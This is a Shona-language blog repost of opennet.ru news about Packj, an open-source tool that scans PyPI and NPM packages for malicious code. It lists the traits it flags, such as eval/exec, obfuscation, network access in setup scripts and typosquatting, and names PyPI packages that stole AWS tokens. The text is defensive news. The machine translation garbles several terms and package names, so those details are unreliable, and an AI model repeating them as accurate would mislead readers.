ProHoster > Blog > internet nhau > Packj - chishandiso chekuziva maraibhurari ane hutsinye muPython neJavaScript

Packj - chishandiso chekuziva maraibhurari ane hutsinye muPython neJavaScript

Vagadziri vePackj papuratifomu, inoongorora kuchengetedzeka kwemaraibhurari, vakaburitsa yakavhurika yekuraira-mutsara wetiturusi iyo inokutendera iwe kuti uone zvine njodzi zvivakwa mumapakeji izvo zvingave zvine chekuita nekuitwa kwehutsinye kana kuvepo kwekusagadzikana kunoshandiswa kurwisa mapurojekiti anoshandisa mapakeji ari mubvunzo ("supply chain"). Inotsigira kutarisa Python uye JavaScript mapakeji akabatwa muPyPi uye NPM madhairekitori (ivo vanorongawo kuwedzera rutsigiro rweRuby neRubyGems mwedzi uno). Iyo kodhi yekushandisa yakanyorwa muPython uye yakagoverwa pasi peiyo AGPLv3 rezinesi.

Munguva yekuongororwa kwezviuru mazana matatu nemakumi matatu emapakeji uchishandisa iyo yakarongwa toolkit, makumi mana nemaviri mapakeji ane hutsinye ane backdoor uye zviuru zviviri nemazana mana emapakeji ane njodzi akaonekwa muPyPi repository. Munguva yeongororo, static kodhi ongororo inoitwa kuona maAPI maficha uye kuvapo kwekusagadzikana kunozivikanwa kunoonekwa muOSV DB kunoongororwa. Iyo MalOSS package inoshandiswa kuongorora iyo API. Iyo kodhi yepakiti inoongororwa kuvepo kwemaitiro akajairika anowanzo shandiswa mune malware. Iwo mapatani akagadzirirwa zvichibva pakudzidza kwe330 mapakeji ane yakasimbiswa hutsinye chiitiko.

Inotaridzawo hunhu uye metadata inowedzera njodzi yekushandisa zvisizvo, sekuuraya zvivharo kuburikidza ne "eval" kana "exec", inogadzira kodhi nyowani uchimhanya, uchishandisa obfuscated uye yakavanzika macode maitiro, manipulating zvakatipoteredza zvakasiyana, kuwana mafaera zvisina kufanira, kuwana network zviwanikwa mu setup scripts (setup.quatting), uchishandisa yakakurumbira mazita uye typorate mazita (lisobraletes). mapurojekiti akasiiwa, achitsanangura maemail asiripo uye mawebhusaiti, uye kusava nenzvimbo yeruzhinji ine kodhi.

Pamusoro pezvo, vamwe vaongorori vezvekuchengetedza vaona mapakeji mashanu ane hutsinye muPyPi repository yakatumira zviri mukati memamiriro ekunze kune yekunze server mukuyedza kuba ma tokens eAWS uye anoenderera mberi ekubatanidza masisitimu: loglib-modules (inounzwa semamodule eiyo pamutemo loglib library), pyg-modules, pygrata-yakaiswa sekuwedzera legitils-mate yekuwedzera iyo pyg library) uye hkg-sol-utils.

Packj - Chishandiso chekuona maraibhurari ane hutsinye muPython uye JavaScript


Source: opennet.ru